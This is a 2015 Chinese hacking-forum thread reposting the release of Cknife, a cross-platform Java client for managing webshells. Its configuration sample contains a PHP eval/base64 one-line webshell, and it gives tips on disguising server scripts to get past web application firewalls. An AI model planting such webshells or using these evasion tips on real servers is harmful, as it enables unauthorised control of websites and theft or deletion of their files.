楼主: 蓝颜

[工具专区] 跨平台版中国菜刀(全平台版)

[复制链接]
  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2015-12-27 19:29:52 | 显示全部楼层 |阅读模式
    看到论坛还没人发,我就共享出来给大家使用!转载幸苦,给点I币意思意思吧

    转载于:FreeBuf.COM

    免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。
    一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~
    前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX  牛,在我完成大体框架后,帮了我不少大忙,包括完成虚拟终端,非常感谢。
    程序采用java语言编写,数据库采用了sqlite,本来想使用access,但是在jdk1.8以后移除了该功能,意味不能使用默认环境连接,最终我选择了sqlite,但是体积增加了800多K,程序本身只有100多K,因为引入了连接sqlite的包,后续会删除一些不想关的类来缩小体积。为了给一些爱美玩家使用,特地生成了一个带有大量皮肤的C刀,不过体积肯定也会更大。
    主程序为Cknife.jar,运行后会生成Cknife.db,以及默认的配置文件Config.ini。
    前面说过这是一款完全基于配置文件的菜刀,主程序只是图形的展示,以及数据的发送,我分开了每一个步骤写入到配置文件里面。可以自定义任何代码,包括更改参数名称,参数内容。
    比如:
    [AppleScript] 纯文本查看 复制代码
    SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel 设置皮肤为nimbus 
    SPL=->|                表示截取数据的开始符号 
    SPR=|<-               表示截取数据的结束符号 
    CODE=code         编码参数 
    ACTION=action    动作参数 
    PARAM1=z1         参数1 
    PARAM2=z2         参数2 
    PHP_BASE64=1   当为PHP时,Z1,Z2参数是否开启自动base64加密,如果想定义自己的加密方式则关闭设置为0 
    PHP_MAKE=@eval(base64_decode($_POST[action]));   生成方式,这里可以不用该方式,可以用你任何想要的方式 
    PHP_INDEX=...             显示主页功能的代码放这 
    PHP_READDICT=...      读取主页功能的代码放着 
    PHP_READFILE=...       读取文件功能的代码 
    PHP_DELETE=...           删除文件夹以及文件功能的代码... 
    PHP_RENAME=...         重命名文件夹以及文件功能的代码... 
    PHP_NEWDICT=...        新建目录功能的代码 
    PHP_UPLOAD=...          上传文件功能的代码 
    PHP_DOWNLOAD=...    下载文件功能的代码 
    PHP_SHELL=...              虚拟终端功能的代码


    如果觉得复杂,其实大多数时间只需要PHP_MAKE过WAF就行了,后面的基本不会查杀。
    程序的自定义功能可以用来变相做另外一种免杀
    自定义配置如下
    [AppleScript] 纯文本查看 复制代码
    CUS_MAKE=1 
    CUS_INDEX=index 
    CUS_READDICT=readdict 
    CUS_READFILE=readfile 
    CUS_SAVEFILE=savefile 
    CUS_DELETE=delete 
    CUS_RENAME=rename 
    CUS_NEWDICT=newdict 
    CUS_UPLOAD=upload 
    CUS_DOWNLOAD=download 
    CUS_SHELL=shell


    只要写的脚本文件能与自定义的能对接上就可以使用。
    那么如果做免杀呢?当你只用MAKE的时候确实想不到办法去过WAF的时候,
    你可以写一个脚本比如PHP的,但是不是一句话,而是实现正常功能的脚本。
    比如这个脚本为1.php,我写一个功能为显示主页的功能,然后提交1.php?action=index,
    选择自定义对接,就可以与C刀进行连接了。前提是你的1.php得过WAF。
    来几张图吧,先看看皮肤版
    14510972013289.jpg
    14510972036433.jpg
    体积有点大,因为加载了皮肤包。
    正常版本,皮肤用的JDK默认的几款,可以自由切换。
    MAC下为MAC皮肤,其余系统为Nimbus皮肤,如果没有则使用Metal皮肤
    Mac
    14510972036433.jpg
    14510972686017.jpg
    14510972684392.jpg
    14510972694227.jpg
    14510972704408.jpg

    Kali

    1451097339686.jpg
    14510973393870.jpg
    14510973409740.jpg

    Win

    14510973771521.jpg
    14510973771620.jpg
    14510973782183.jpg

    下载地址     密码:34qh
    补充下关于JSP脚本,修复了原版本菜刀JSP上传失败的问题。
    帮老大打个广告团队各种需求二进制大咖,安卓大咖,IOS大咖,小菜我也好抱抱大腿。团队里有@titian ,@小荷才露尖尖角  技术牛,有各种搞基流,大腿流,人流等等。。
    大家有建议活着要修复的BUG直接私信我或者私信MelodyZX都行,最近比较忙,等手头事情忙完,会不定期在MS509 Team博客更新。
    免责声明:该软件仅限用于学习和研究目的;不得将本软件用于商业或者非法用途,否则,一切后果用户自负。

    评分

    参与人数 1i币 +5 收起 理由
    面包加火腿 + 5 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

     楼主| 发表于 2015-12-27 19:30:39 | 显示全部楼层
    需要的朋友下载玩吧   
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-6-6 13:33
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2015-12-27 23:06:48 | 显示全部楼层
    。。。。没看见你发的,,我也发了一篇,,再看你先转载过来了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 12:19:01 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 13:37:21 | 显示全部楼层
    GOOD Thanks for sharing
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 13:40:43 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 18:07:29 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 23:31:14 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-29 00:43:30 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-12-29 05:09:54 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 15:58 , Processed in 0.024934 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部